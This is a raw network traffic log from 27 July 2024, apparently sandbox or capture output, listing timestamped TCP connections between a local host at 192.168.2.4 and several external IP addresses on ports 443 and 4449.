Jul 27, 2024 07:44:51.879131079 CEST	443	62307	167.235.128.153	192.168.2.4
Jul 27, 2024 07:44:51.883785963 CEST	62307	443	192.168.2.4	167.235.128.153
Jul 27, 2024 07:44:51.899451017 CEST	62307	443	192.168.2.4	167.235.128.153
Jul 27, 2024 07:44:51.899492025 CEST	443	62307	167.235.128.153	192.168.2.4
Jul 27, 2024 07:44:51.899566889 CEST	62307	443	192.168.2.4	167.235.128.153
Jul 27, 2024 07:44:51.899581909 CEST	443	62307	167.235.128.153	192.168.2.4
Jul 27, 2024 07:44:52.020551920 CEST	62308	443	192.168.2.4	107.173.160.137
Jul 27, 2024 07:44:52.020586014 CEST	443	62308	107.173.160.137	192.168.2.4
Jul 27, 2024 07:44:52.021022081 CEST	62308	443	192.168.2.4	107.173.160.137
Jul 27, 2024 07:44:52.023654938 CEST	62308	443	192.168.2.4	107.173.160.137
Jul 27, 2024 07:44:52.023667097 CEST	443	62308	107.173.160.137	192.168.2.4
Jul 27, 2024 07:44:52.633255005 CEST	443	62308	107.173.160.137	192.168.2.4
Jul 27, 2024 07:44:52.633687973 CEST	62308	443	192.168.2.4	107.173.160.137
Jul 27, 2024 07:44:52.635781050 CEST	62308	443	192.168.2.4	107.173.160.137
Jul 27, 2024 07:44:52.635791063 CEST	443	62308	107.173.160.137	192.168.2.4
Jul 27, 2024 07:44:52.635999918 CEST	62308	443	192.168.2.4	107.173.160.137
Jul 27, 2024 07:44:52.636003971 CEST	443	62308	107.173.160.137	192.168.2.4
Jul 27, 2024 07:44:52.636074066 CEST	443	62308	107.173.160.137	192.168.2.4
Jul 27, 2024 07:44:52.636315107 CEST	62308	443	192.168.2.4	107.173.160.137
Jul 27, 2024 07:44:52.636323929 CEST	443	62308	107.173.160.137	192.168.2.4
Jul 27, 2024 07:44:53.872581005 CEST	443	62308	107.173.160.137	192.168.2.4
Jul 27, 2024 07:44:53.872669935 CEST	443	62308	107.173.160.137	192.168.2.4
Jul 27, 2024 07:44:53.873142004 CEST	62308	443	192.168.2.4	107.173.160.137
Jul 27, 2024 07:44:53.888654947 CEST	62308	443	192.168.2.4	107.173.160.137
Jul 27, 2024 07:44:53.888673067 CEST	443	62308	107.173.160.137	192.168.2.4
Jul 27, 2024 07:44:53.888686895 CEST	62308	443	192.168.2.4	107.173.160.137
Jul 27, 2024 07:44:53.888693094 CEST	443	62308	107.173.160.137	192.168.2.4
Jul 27, 2024 07:44:53.990763903 CEST	62309	443	192.168.2.4	107.173.160.139
Jul 27, 2024 07:44:53.990787983 CEST	443	62309	107.173.160.139	192.168.2.4
Jul 27, 2024 07:44:53.994613886 CEST	62309	443	192.168.2.4	107.173.160.139
Jul 27, 2024 07:44:53.995033979 CEST	62309	443	192.168.2.4	107.173.160.139
Jul 27, 2024 07:44:53.995049953 CEST	443	62309	107.173.160.139	192.168.2.4
Jul 27, 2024 07:44:54.531244040 CEST	62311	443	192.168.2.4	172.67.213.85
Jul 27, 2024 07:44:54.531325102 CEST	443	62311	172.67.213.85	192.168.2.4
Jul 27, 2024 07:44:54.531805038 CEST	62311	443	192.168.2.4	172.67.213.85
Jul 27, 2024 07:44:54.533174992 CEST	62311	443	192.168.2.4	172.67.213.85
Jul 27, 2024 07:44:54.533211946 CEST	443	62311	172.67.213.85	192.168.2.4
Jul 27, 2024 07:44:54.596432924 CEST	443	62309	107.173.160.139	192.168.2.4
Jul 27, 2024 07:44:54.597539902 CEST	62309	443	192.168.2.4	107.173.160.139
Jul 27, 2024 07:44:54.600938082 CEST	62309	443	192.168.2.4	107.173.160.139
Jul 27, 2024 07:44:54.600948095 CEST	443	62309	107.173.160.139	192.168.2.4
Jul 27, 2024 07:44:54.601387978 CEST	62309	443	192.168.2.4	107.173.160.139
Jul 27, 2024 07:44:54.601398945 CEST	443	62309	107.173.160.139	192.168.2.4
Jul 27, 2024 07:44:54.601469040 CEST	443	62309	107.173.160.139	192.168.2.4
Jul 27, 2024 07:44:54.605076075 CEST	62309	443	192.168.2.4	107.173.160.139
Jul 27, 2024 07:44:54.652539968 CEST	443	62309	107.173.160.139	192.168.2.4
Jul 27, 2024 07:44:55.017818928 CEST	443	62311	172.67.213.85	192.168.2.4
Jul 27, 2024 07:44:55.023319960 CEST	62311	443	192.168.2.4	172.67.213.85
Jul 27, 2024 07:44:55.028187990 CEST	62311	443	192.168.2.4	172.67.213.85
Jul 27, 2024 07:44:55.028239012 CEST	443	62311	172.67.213.85	192.168.2.4
Jul 27, 2024 07:44:55.028779030 CEST	443	62311	172.67.213.85	192.168.2.4
Jul 27, 2024 07:44:55.030107021 CEST	62311	443	192.168.2.4	172.67.213.85
Jul 27, 2024 07:44:55.030934095 CEST	62311	443	192.168.2.4	172.67.213.85
Jul 27, 2024 07:44:55.031042099 CEST	443	62311	172.67.213.85	192.168.2.4
Jul 27, 2024 07:44:55.031985044 CEST	62311	443	192.168.2.4	172.67.213.85
Jul 27, 2024 07:44:55.032054901 CEST	443	62311	172.67.213.85	192.168.2.4
Jul 27, 2024 07:44:55.032210112 CEST	62311	443	192.168.2.4	172.67.213.85
Jul 27, 2024 07:44:55.032385111 CEST	443	62311	172.67.213.85	192.168.2.4
Jul 27, 2024 07:44:55.032834053 CEST	62311	443	192.168.2.4	172.67.213.85
Jul 27, 2024 07:44:55.032897949 CEST	443	62311	172.67.213.85	192.168.2.4
Jul 27, 2024 07:44:55.037066936 CEST	62311	443	192.168.2.4	172.67.213.85
Jul 27, 2024 07:44:55.037161112 CEST	443	62311	172.67.213.85	192.168.2.4
Jul 27, 2024 07:44:55.037520885 CEST	62311	443	192.168.2.4	172.67.213.85
Jul 27, 2024 07:44:55.037617922 CEST	443	62311	172.67.213.85	192.168.2.4
Jul 27, 2024 07:44:55.037666082 CEST	62311	443	192.168.2.4	172.67.213.85
Jul 27, 2024 07:44:55.037723064 CEST	443	62311	172.67.213.85	192.168.2.4
Jul 27, 2024 07:44:55.039129972 CEST	62311	443	192.168.2.4	172.67.213.85
Jul 27, 2024 07:44:55.039194107 CEST	62311	443	192.168.2.4	172.67.213.85
Jul 27, 2024 07:44:55.043560982 CEST	443	62311	172.67.213.85	192.168.2.4
Jul 27, 2024 07:44:55.044198036 CEST	62311	443	192.168.2.4	172.67.213.85
Jul 27, 2024 07:44:55.044250965 CEST	443	62311	172.67.213.85	192.168.2.4
Jul 27, 2024 07:44:55.044291973 CEST	62311	443	192.168.2.4	172.67.213.85
Jul 27, 2024 07:44:55.044336081 CEST	62311	443	192.168.2.4	172.67.213.85
Jul 27, 2024 07:44:55.045192957 CEST	62311	443	192.168.2.4	172.67.213.85
Jul 27, 2024 07:44:55.045269966 CEST	62311	443	192.168.2.4	172.67.213.85
Jul 27, 2024 07:44:55.048561096 CEST	443	62311	172.67.213.85	192.168.2.4
Jul 27, 2024 07:44:55.050401926 CEST	62311	443	192.168.2.4	172.67.213.85
Jul 27, 2024 07:44:55.050473928 CEST	443	62311	172.67.213.85	192.168.2.4
Jul 27, 2024 07:44:55.949779987 CEST	443	62309	107.173.160.139	192.168.2.4
Jul 27, 2024 07:44:55.949877024 CEST	443	62309	107.173.160.139	192.168.2.4
Jul 27, 2024 07:44:55.961970091 CEST	62309	443	192.168.2.4	107.173.160.139
Jul 27, 2024 07:44:56.003436089 CEST	62309	443	192.168.2.4	107.173.160.139
Jul 27, 2024 07:44:56.003436089 CEST	62309	443	192.168.2.4	107.173.160.139
Jul 27, 2024 07:44:56.003463030 CEST	443	62309	107.173.160.139	192.168.2.4
Jul 27, 2024 07:44:56.003474951 CEST	443	62309	107.173.160.139	192.168.2.4
Jul 27, 2024 07:44:56.104978085 CEST	62312	443	192.168.2.4	167.235.128.153
Jul 27, 2024 07:44:56.105057955 CEST	443	62312	167.235.128.153	192.168.2.4
Jul 27, 2024 07:44:56.105247021 CEST	62312	443	192.168.2.4	167.235.128.153
Jul 27, 2024 07:44:56.105752945 CEST	62312	443	192.168.2.4	167.235.128.153
Jul 27, 2024 07:44:56.105792046 CEST	443	62312	167.235.128.153	192.168.2.4
Jul 27, 2024 07:44:56.793983936 CEST	443	62312	167.235.128.153	192.168.2.4
Jul 27, 2024 07:44:56.797825098 CEST	62312	443	192.168.2.4	167.235.128.153
Jul 27, 2024 07:44:56.800730944 CEST	62312	443	192.168.2.4	167.235.128.153
Jul 27, 2024 07:44:56.800760984 CEST	443	62312	167.235.128.153	192.168.2.4
Jul 27, 2024 07:44:56.800851107 CEST	62312	443	192.168.2.4	167.235.128.153
Jul 27, 2024 07:44:56.800863981 CEST	443	62312	167.235.128.153	192.168.2.4
Jul 27, 2024 07:44:56.801112890 CEST	443	62312	167.235.128.153	192.168.2.4
Jul 27, 2024 07:44:56.807862997 CEST	62312	443	192.168.2.4	167.235.128.153
Jul 27, 2024 07:44:56.852536917 CEST	443	62312	167.235.128.153	192.168.2.4
Jul 27, 2024 07:44:57.319590092 CEST	443	62311	172.67.213.85	192.168.2.4
Jul 27, 2024 07:44:57.319818020 CEST	443	62311	172.67.213.85	192.168.2.4
Jul 27, 2024 07:44:57.319875956 CEST	62311	443	192.168.2.4	172.67.213.85
Jul 27, 2024 07:44:57.333504915 CEST	4449	62293	193.222.96.24	192.168.2.4
Jul 27, 2024 07:44:57.333872080 CEST	62293	4449	192.168.2.4	193.222.96.24
Jul 27, 2024 07:44:57.351279974 CEST	62311	443	192.168.2.4	172.67.213.85
Jul 27, 2024 07:44:57.351341009 CEST	443	62311	172.67.213.85	192.168.2.4
Jul 27, 2024 07:44:57.399645090 CEST	62315	443	192.168.2.4	172.67.213.85
Jul 27, 2024 07:44:57.399724007 CEST	443	62315	172.67.213.85	192.168.2.4
Jul 27, 2024 07:44:57.399810076 CEST	62315	443	192.168.2.4	172.67.213.85
Jul 27, 2024 07:44:57.400162935 CEST	62315	443	192.168.2.4	172.67.213.85
Jul 27, 2024 07:44:57.400197029 CEST	443	62315	172.67.213.85	192.168.2.4
Jul 27, 2024 07:44:57.809499025 CEST	443	62312	167.235.128.153	192.168.2.4
Jul 27, 2024 07:44:57.809591055 CEST	443	62312	167.235.128.153	192.168.2.4
Jul 27, 2024 07:44:57.809645891 CEST	62312	443	192.168.2.4	167.235.128.153
Jul 27, 2024 07:44:57.825320959 CEST	62312	443	192.168.2.4	167.235.128.153
Jul 27, 2024 07:44:57.825344086 CEST	443	62312	167.235.128.153	192.168.2.4
Jul 27, 2024 07:44:57.825362921 CEST	62312	443	192.168.2.4	167.235.128.153
Jul 27, 2024 07:44:57.825371981 CEST	443	62312	167.235.128.153	192.168.2.4
Jul 27, 2024 07:44:57.878032923 CEST	443	62315	172.67.213.85	192.168.2.4
Jul 27, 2024 07:44:57.878118992 CEST	62315	443	192.168.2.4	172.67.213.85
Jul 27, 2024 07:44:57.884370089 CEST	62315	443	192.168.2.4	172.67.213.85
Jul 27, 2024 07:44:57.884396076 CEST	443	62315	172.67.213.85	192.168.2.4
Jul 27, 2024 07:44:57.884816885 CEST	443	62315	172.67.213.85	192.168.2.4
Jul 27, 2024 07:44:57.886111975 CEST	62315	443	192.168.2.4	172.67.213.85
Jul 27, 2024 07:44:57.886149883 CEST	62315	443	192.168.2.4	172.67.213.85
Jul 27, 2024 07:44:57.886209965 CEST	443	62315	172.67.213.85	192.168.2.4
Jul 27, 2024 07:44:57.927350044 CEST	62316	443	192.168.2.4	107.173.160.137
Jul 27, 2024 07:44:57.927372932 CEST	443	62316	107.173.160.137	192.168.2.4
Jul 27, 2024 07:44:57.927436113 CEST	62316	443	192.168.2.4	107.173.160.137
Jul 27, 2024 07:44:57.927838087 CEST	62316	443	192.168.2.4	107.173.160.137
Jul 27, 2024 07:44:57.927851915 CEST	443	62316	107.173.160.137	192.168.2.4
Jul 27, 2024 07:44:58.284297943 CEST	443	62315	172.67.213.85	192.168.2.4
Jul 27, 2024 07:44:58.284562111 CEST	443	62315	172.67.213.85	192.168.2.4
Jul 27, 2024 07:44:58.284650087 CEST	62315	443	192.168.2.4	172.67.213.85
Jul 27, 2024 07:44:58.305571079 CEST	62315	443	192.168.2.4	172.67.213.85
Jul 27, 2024 07:44:58.305638075 CEST	443	62315	172.67.213.85	192.168.2.4
Jul 27, 2024 07:44:58.305675030 CEST	62315	443	192.168.2.4	172.67.213.85
Jul 27, 2024 07:44:58.305694103 CEST	443	62315	172.67.213.85	192.168.2.4
Jul 27, 2024 07:44:58.724656105 CEST	443	62316	107.173.160.137	192.168.2.4
Jul 27, 2024 07:44:58.724761963 CEST	62316	443	192.168.2.4	107.173.160.137
Jul 27, 2024 07:44:58.727375984 CEST	62316	443	192.168.2.4	107.173.160.137
Jul 27, 2024 07:44:58.727385998 CEST	443	62316	107.173.160.137	192.168.2.4
Jul 27, 2024 07:44:58.727839947 CEST	62316	443	192.168.2.4	107.173.160.137
Jul 27, 2024 07:44:58.727844000 CEST	443	62316	107.173.160.137	192.168.2.4
Jul 27, 2024 07:44:58.727914095 CEST	443	62316	107.173.160.137	192.168.2.4
Jul 27, 2024 07:44:58.729371071 CEST	62316	443	192.168.2.4	107.173.160.137
Jul 27, 2024 07:44:58.742692947 CEST	62317	443	192.168.2.4	172.67.213.85
Jul 27, 2024 07:44:58.742772102 CEST	443	62317	172.67.213.85	192.168.2.4
Jul 27, 2024 07:44:58.742861032 CEST	62317	443	192.168.2.4	172.67.213.85
Jul 27, 2024 07:44:58.743206024 CEST	62317	443	192.168.2.4	172.67.213.85
Jul 27, 2024 07:44:58.743241072 CEST	443	62317	172.67.213.85	192.168.2.4
Jul 27, 2024 07:44:58.772522926 CEST	443	62316	107.173.160.137	192.168.2.4
Jul 27, 2024 07:44:59.418601990 CEST	443	62317	172.67.213.85	192.168.2.4
Jul 27, 2024 07:44:59.418725014 CEST	62317	443	192.168.2.4	172.67.213.85
Jul 27, 2024 07:45:00.217642069 CEST	443	62316	107.173.160.137	192.168.2.4
Jul 27, 2024 07:45:00.217725992 CEST	443	62316	107.173.160.137	192.168.2.4
Jul 27, 2024 07:45:00.217943907 CEST	62316	443	192.168.2.4	107.173.160.137
Jul 27, 2024 07:45:00.233947992 CEST	62316	443	192.168.2.4	107.173.160.137
Jul 27, 2024 07:45:00.233967066 CEST	443	62316	107.173.160.137	192.168.2.4
Jul 27, 2024 07:45:00.233983040 CEST	62316	443	192.168.2.4	107.173.160.137
Jul 27, 2024 07:45:00.233988047 CEST	443	62316	107.173.160.137	192.168.2.4
Jul 27, 2024 07:45:00.349212885 CEST	62318	443	192.168.2.4	107.173.160.139
Jul 27, 2024 07:45:00.349241018 CEST	443	62318	107.173.160.139	192.168.2.4
Jul 27, 2024 07:45:00.349560976 CEST	62318	443	192.168.2.4	107.173.160.139
Jul 27, 2024 07:45:00.349946022 CEST	62318	443	192.168.2.4	107.173.160.139
Jul 27, 2024 07:45:00.349961042 CEST	443	62318	107.173.160.139	192.168.2.4
Jul 27, 2024 07:45:00.354790926 CEST	62293	4449	192.168.2.4	193.222.96.24
Jul 27, 2024 07:45:00.360533953 CEST	4449	62293	193.222.96.24	192.168.2.4
Jul 27, 2024 07:45:00.362186909 CEST	62319	4449	192.168.2.4	94.156.79.190
Jul 27, 2024 07:45:00.367599964 CEST	4449	62319	94.156.79.190	192.168.2.4
Jul 27, 2024 07:45:00.367856026 CEST	62319	4449	192.168.2.4	94.156.79.190
Jul 27, 2024 07:45:00.368050098 CEST	62319	4449	192.168.2.4	94.156.79.190
Jul 27, 2024 07:45:00.373168945 CEST	4449	62319	94.156.79.190	192.168.2.4
Jul 27, 2024 07:45:00.940562010 CEST	443	62318	107.173.160.139	192.168.2.4
Jul 27, 2024 07:45:00.940637112 CEST	62318	443	192.168.2.4	107.173.160.139
Jul 27, 2024 07:45:00.943068981 CEST	62318	443	192.168.2.4	107.173.160.139
Jul 27, 2024 07:45:00.943078995 CEST	443	62318	107.173.160.139	192.168.2.4
Jul 27, 2024 07:45:00.943278074 CEST	62318	443	192.168.2.4	107.173.160.139
Jul 27, 2024 07:45:00.943281889 CEST	443	62318	107.173.160.139	192.168.2.4
Jul 27, 2024 07:45:00.943348885 CEST	443	62318	107.173.160.139	192.168.2.4
Jul 27, 2024 07:45:00.943490028 CEST	62318	443	192.168.2.4	107.173.160.139
Jul 27, 2024 07:45:00.984515905 CEST	443	62318	107.173.160.139	192.168.2.4
Jul 27, 2024 07:45:02.277709007 CEST	443	62318	107.173.160.139	192.168.2.4
Jul 27, 2024 07:45:02.277779102 CEST	443	62318	107.173.160.139	192.168.2.4
Jul 27, 2024 07:45:02.277822971 CEST	62318	443	192.168.2.4	107.173.160.139
Jul 27, 2024 07:45:02.294514894 CEST	62318	443	192.168.2.4	107.173.160.139
Jul 27, 2024 07:45:02.294528008 CEST	443	62318	107.173.160.139	192.168.2.4
Jul 27, 2024 07:45:02.396218061 CEST	62321	443	192.168.2.4	167.235.128.153
Jul 27, 2024 07:45:02.396261930 CEST	443	62321	167.235.128.153	192.168.2.4
Jul 27, 2024 07:45:02.396331072 CEST	62321	443	192.168.2.4	167.235.128.153
Jul 27, 2024 07:45:02.396888018 CEST	62321	443	192.168.2.4	167.235.128.153
Jul 27, 2024 07:45:02.396907091 CEST	443	62321	167.235.128.153	192.168.2.4
Jul 27, 2024 07:45:03.078555107 CEST	443	62321	167.235.128.153	192.168.2.4
Jul 27, 2024 07:45:03.078735113 CEST	62321	443	192.168.2.4	167.235.128.153
Jul 27, 2024 07:45:03.081080914 CEST	62321	443	192.168.2.4	167.235.128.153
Jul 27, 2024 07:45:03.081095934 CEST	443	62321	167.235.128.153	192.168.2.4
Jul 27, 2024 07:45:03.081245899 CEST	62321	443	192.168.2.4	167.235.128.153
Jul 27, 2024 07:45:03.081253052 CEST	443	62321	167.235.128.153	192.168.2.4
Jul 27, 2024 07:45:03.081474066 CEST	443	62321	167.235.128.153	192.168.2.4
Jul 27, 2024 07:45:03.084656954 CEST	62321	443	192.168.2.4	167.235.128.153
Jul 27, 2024 07:45:03.084676981 CEST	443	62321	167.235.128.153	192.168.2.4
Jul 27, 2024 07:45:03.932095051 CEST	443	62321	167.235.128.153	192.168.2.4
Jul 27, 2024 07:45:03.932178974 CEST	443	62321	167.235.128.153	192.168.2.4
Jul 27, 2024 07:45:03.932243109 CEST	62321	443	192.168.2.4	167.235.128.153
Jul 27, 2024 07:45:03.948771954 CEST	62321	443	192.168.2.4	167.235.128.153
Jul 27, 2024 07:45:03.948793888 CEST	443	62321	167.235.128.153	192.168.2.4
Jul 27, 2024 07:45:03.948811054 CEST	62321	443	192.168.2.4	167.235.128.153
Jul 27, 2024 07:45:03.948818922 CEST	443	62321	167.235.128.153	192.168.2.4
Jul 27, 2024 07:45:04.052611113 CEST	62322	443	192.168.2.4	107.173.160.137
Jul 27, 2024 07:45:04.052691936 CEST	443	62322	107.173.160.137	192.168.2.4
Jul 27, 2024 07:45:04.052772045 CEST	62322	443	192.168.2.4	107.173.160.137
Jul 27, 2024 07:45:04.053215981 CEST	62322	443	192.168.2.4	107.173.160.137
Jul 27, 2024 07:45:04.053253889 CEST	443	62322	107.173.160.137	192.168.2.4
Jul 27, 2024 07:45:04.682949066 CEST	443	62322	107.173.160.137	192.168.2.4
Jul 27, 2024 07:45:04.683123112 CEST	62322	443	192.168.2.4	107.173.160.137
Jul 27, 2024 07:45:04.685317039 CEST	62322	443	192.168.2.4	107.173.160.137
Jul 27, 2024 07:45:04.685331106 CEST	443	62322	107.173.160.137	192.168.2.4
Jul 27, 2024 07:45:04.685455084 CEST	62322	443	192.168.2.4	107.173.160.137
Jul 27, 2024 07:45:04.685461044 CEST	443	62322	107.173.160.137	192.168.2.4
Jul 27, 2024 07:45:04.686104059 CEST	443	62322	107.173.160.137	192.168.2.4
Jul 27, 2024 07:45:04.688541889 CEST	62322	443	192.168.2.4	107.173.160.137
Jul 27, 2024 07:45:04.732496023 CEST	443	62322	107.173.160.137	192.168.2.4
Jul 27, 2024 07:45:06.075423956 CEST	443	62322	107.173.160.137	192.168.2.4
Jul 27, 2024 07:45:06.075588942 CEST	443	62322	107.173.160.137	192.168.2.4
Jul 27, 2024 07:45:06.075665951 CEST	62322	443	192.168.2.4	107.173.160.137
Jul 27, 2024 07:45:06.091629982 CEST	62322	443	192.168.2.4	107.173.160.137
Jul 27, 2024 07:45:06.091682911 CEST	443	62322	107.173.160.137	192.168.2.4
Jul 27, 2024 07:45:06.091757059 CEST	62322	443	192.168.2.4	107.173.160.137
Jul 27, 2024 07:45:06.091773033 CEST	443	62322	107.173.160.137	192.168.2.4
Jul 27, 2024 07:45:06.192917109 CEST	62324	443	192.168.2.4	107.173.160.139
Jul 27, 2024 07:45:06.193000078 CEST	443	62324	107.173.160.139	192.168.2.4
Jul 27, 2024 07:45:06.193176985 CEST	62324	443	192.168.2.4	107.173.160.139
Jul 27, 2024 07:45:06.193463087 CEST	62324	443	192.168.2.4	107.173.160.139
Jul 27, 2024 07:45:06.193491936 CEST	443	62324	107.173.160.139	192.168.2.4
Jul 27, 2024 07:45:06.798082113 CEST	443	62324	107.173.160.139	192.168.2.4
Jul 27, 2024 07:45:06.798247099 CEST	62324	443	192.168.2.4	107.173.160.139
Jul 27, 2024 07:45:06.801506996 CEST	62324	443	192.168.2.4	107.173.160.139
Jul 27, 2024 07:45:06.801532984 CEST	443	62324	107.173.160.139	192.168.2.4
Jul 27, 2024 07:45:06.801587105 CEST	62324	443	192.168.2.4	107.173.160.139
Jul 27, 2024 07:45:06.801598072 CEST	443	62324	107.173.160.139	192.168.2.4
Jul 27, 2024 07:45:06.801836014 CEST	62324	443	192.168.2.4	107.173.160.139
Jul 27, 2024 07:45:06.801846027 CEST	443	62324	107.173.160.139	192.168.2.4
Jul 27, 2024 07:45:06.802042007 CEST	443	62324	107.173.160.139	192.168.2.4
Jul 27, 2024 07:45:06.802190065 CEST	62324	443	192.168.2.4	107.173.160.139
Jul 27, 2024 07:45:06.844541073 CEST	443	62324	107.173.160.139	192.168.2.4
Jul 27, 2024 07:45:08.054657936 CEST	443	62324	107.173.160.139	192.168.2.4
Jul 27, 2024 07:45:08.054804087 CEST	443	62324	107.173.160.139	192.168.2.4
Jul 27, 2024 07:45:08.054882050 CEST	62324	443	192.168.2.4	107.173.160.139
Jul 27, 2024 07:45:08.067728996 CEST	62324	443	192.168.2.4	107.173.160.139
Jul 27, 2024 07:45:08.067775011 CEST	443	62324	107.173.160.139	192.168.2.4
Jul 27, 2024 07:45:08.067826033 CEST	62324	443	192.168.2.4	107.173.160.139
Jul 27, 2024 07:45:08.067842960 CEST	443	62324	107.173.160.139	192.168.2.4
Jul 27, 2024 07:45:08.177768946 CEST	62326	443	192.168.2.4	167.235.128.153
Jul 27, 2024 07:45:08.177849054 CEST	443	62326	167.235.128.153	192.168.2.4
Jul 27, 2024 07:45:08.178080082 CEST	62326	443	192.168.2.4	167.235.128.153
Jul 27, 2024 07:45:08.178328037 CEST	62326	443	192.168.2.4	167.235.128.153
Jul 27, 2024 07:45:08.178360939 CEST	443	62326	167.235.128.153	192.168.2.4
Jul 27, 2024 07:45:08.831222057 CEST	443	62326	167.235.128.153	192.168.2.4
Jul 27, 2024 07:45:08.831295967 CEST	62326	443	192.168.2.4	167.235.128.153
Jul 27, 2024 07:45:08.833708048 CEST	62326	443	192.168.2.4	167.235.128.153
Jul 27, 2024 07:45:08.833735943 CEST	443	62326	167.235.128.153	192.168.2.4
Jul 27, 2024 07:45:08.833798885 CEST	62326	443	192.168.2.4	167.235.128.153
Jul 27, 2024 07:45:08.833810091 CEST	443	62326	167.235.128.153	192.168.2.4
Jul 27, 2024 07:45:08.834067106 CEST	443	62326	167.235.128.153	192.168.2.4
Jul 27, 2024 07:45:08.834186077 CEST	62326	443	192.168.2.4	167.235.128.153
Jul 27, 2024 07:45:08.876538038 CEST	443	62326	167.235.128.153	192.168.2.4
Jul 27, 2024 07:45:09.698199987 CEST	443	62326	167.235.128.153	192.168.2.4
Jul 27, 2024 07:45:09.698369026 CEST	443	62326	167.235.128.153	192.168.2.4
Jul 27, 2024 07:45:09.698549986 CEST	62326	443	192.168.2.4	167.235.128.153
Jul 27, 2024 07:45:09.751782894 CEST	62326	443	192.168.2.4	167.235.128.153
Jul 27, 2024 07:45:09.751852036 CEST	443	62326	167.235.128.153	192.168.2.4
Jul 27, 2024 07:45:09.751889944 CEST	62326	443	192.168.2.4	167.235.128.153
Jul 27, 2024 07:45:09.751908064 CEST	443	62326	167.235.128.153	192.168.2.4
Jul 27, 2024 07:45:09.865356922 CEST	62329	443	192.168.2.4	107.173.160.137
Jul 27, 2024 07:45:09.865446091 CEST	443	62329	107.173.160.137	192.168.2.4
Jul 27, 2024 07:45:09.865545988 CEST	62329	443	192.168.2.4	107.173.160.137
Jul 27, 2024 07:45:09.865959883 CEST	62329	443	192.168.2.4	107.173.160.137
Jul 27, 2024 07:45:09.865993023 CEST	443	62329	107.173.160.137	192.168.2.4
Jul 27, 2024 07:45:10.491679907 CEST	443	62329	107.173.160.137	192.168.2.4
Jul 27, 2024 07:45:10.491776943 CEST	62329	443	192.168.2.4	107.173.160.137
Jul 27, 2024 07:45:10.493927956 CEST	62329	443	192.168.2.4	107.173.160.137
Jul 27, 2024 07:45:10.493954897 CEST	443	62329	107.173.160.137	192.168.2.4
Jul 27, 2024 07:45:10.494015932 CEST	62329	443	192.168.2.4	107.173.160.137
Jul 27, 2024 07:45:10.494028091 CEST	443	62329	107.173.160.137	192.168.2.4
Jul 27, 2024 07:45:10.494729996 CEST	443	62329	107.173.160.137	192.168.2.4
Jul 27, 2024 07:45:10.494887114 CEST	62329	443	192.168.2.4	107.173.160.137
Jul 27, 2024 07:45:10.536542892 CEST	443	62329	107.173.160.137	192.168.2.4
Jul 27, 2024 07:45:12.385705948 CEST	443	62329	107.173.160.137	192.168.2.4
Jul 27, 2024 07:45:12.385890961 CEST	443	62329	107.173.160.137	192.168.2.4
Jul 27, 2024 07:45:12.385977983 CEST	62329	443	192.168.2.4	107.173.160.137
Jul 27, 2024 07:45:12.398379087 CEST	62329	443	192.168.2.4	107.173.160.137
Jul 27, 2024 07:45:12.398441076 CEST	443	62329	107.173.160.137	192.168.2.4
Jul 27, 2024 07:45:12.398473978 CEST	62329	443	192.168.2.4	107.173.160.137
Jul 27, 2024 07:45:12.398490906 CEST	443	62329	107.173.160.137	192.168.2.4
Jul 27, 2024 07:45:12.505973101 CEST	62332	443	192.168.2.4	107.173.160.139
Jul 27, 2024 07:45:12.506052971 CEST	443	62332	107.173.160.139	192.168.2.4
Jul 27, 2024 07:45:12.506134033 CEST	62332	443	192.168.2.4	107.173.160.139
Jul 27, 2024 07:45:12.506759882 CEST	62332	443	192.168.2.4	107.173.160.139
Jul 27, 2024 07:45:12.506808996 CEST	443	62332	107.173.160.139	192.168.2.4
Jul 27, 2024 07:45:13.122585058 CEST	443	62332	107.173.160.139	192.168.2.4
Jul 27, 2024 07:45:13.122697115 CEST	62332	443	192.168.2.4	107.173.160.139
Jul 27, 2024 07:45:13.124875069 CEST	62332	443	192.168.2.4	107.173.160.139
Jul 27, 2024 07:45:13.124902964 CEST	443	62332	107.173.160.139	192.168.2.4
Jul 27, 2024 07:45:13.124959946 CEST	62332	443	192.168.2.4	107.173.160.139
Jul 27, 2024 07:45:13.124970913 CEST	443	62332	107.173.160.139	192.168.2.4
Jul 27, 2024 07:45:13.125896931 CEST	443	62332	107.173.160.139	192.168.2.4
Jul 27, 2024 07:45:13.126199961 CEST	62332	443	192.168.2.4	107.173.160.139
Jul 27, 2024 07:45:13.168591976 CEST	443	62332	107.173.160.139	192.168.2.4
Jul 27, 2024 07:45:15.031199932 CEST	443	62332	107.173.160.139	192.168.2.4
Jul 27, 2024 07:45:15.031280994 CEST	443	62317	172.67.213.85	192.168.2.4
Jul 27, 2024 07:45:15.031368017 CEST	443	62332	107.173.160.139	192.168.2.4
Jul 27, 2024 07:45:15.031364918 CEST	62317	443	192.168.2.4	172.67.213.85
Jul 27, 2024 07:45:15.031552076 CEST	62332	443	192.168.2.4	107.173.160.139
Jul 27, 2024 07:45:15.045686007 CEST	62332	443	192.168.2.4	107.173.160.139
Jul 27, 2024 07:45:15.045686007 CEST	62332	443	192.168.2.4	107.173.160.139
Jul 27, 2024 07:45:15.045753002 CEST	443	62332	107.173.160.139	192.168.2.4
Jul 27, 2024 07:45:15.045789003 CEST	443	62332	107.173.160.139	192.168.2.4
Jul 27, 2024 07:45:15.146522999 CEST	62335	443	192.168.2.4	167.235.128.153
Jul 27, 2024 07:45:15.146600962 CEST	443	62335	167.235.128.153	192.168.2.4
Jul 27, 2024 07:45:15.146687984 CEST	62335	443	192.168.2.4	167.235.128.153
Jul 27, 2024 07:45:15.147187948 CEST	62335	443	192.168.2.4	167.235.128.153
Jul 27, 2024 07:45:15.147222042 CEST	443	62335	167.235.128.153	192.168.2.4
Jul 27, 2024 07:45:15.809448004 CEST	443	62335	167.235.128.153	192.168.2.4
Jul 27, 2024 07:45:15.809659958 CEST	62335	443	192.168.2.4	167.235.128.153
Jul 27, 2024 07:45:15.811779022 CEST	62335	443	192.168.2.4	167.235.128.153
Jul 27, 2024 07:45:15.811831951 CEST	443	62335	167.235.128.153	192.168.2.4
Jul 27, 2024 07:45:15.811898947 CEST	62335	443	192.168.2.4	167.235.128.153
Jul 27, 2024 07:45:15.811912060 CEST	443	62335	167.235.128.153	192.168.2.4
Jul 27, 2024 07:45:15.812357903 CEST	443	62335	167.235.128.153	192.168.2.4
Jul 27, 2024 07:45:15.812958002 CEST	62335	443	192.168.2.4	167.235.128.153
Jul 27, 2024 07:45:15.856581926 CEST	443	62335	167.235.128.153	192.168.2.4
Jul 27, 2024 07:45:16.263590097 CEST	62317	443	192.168.2.4	172.67.213.85
Jul 27, 2024 07:45:16.263654947 CEST	443	62317	172.67.213.85	192.168.2.4
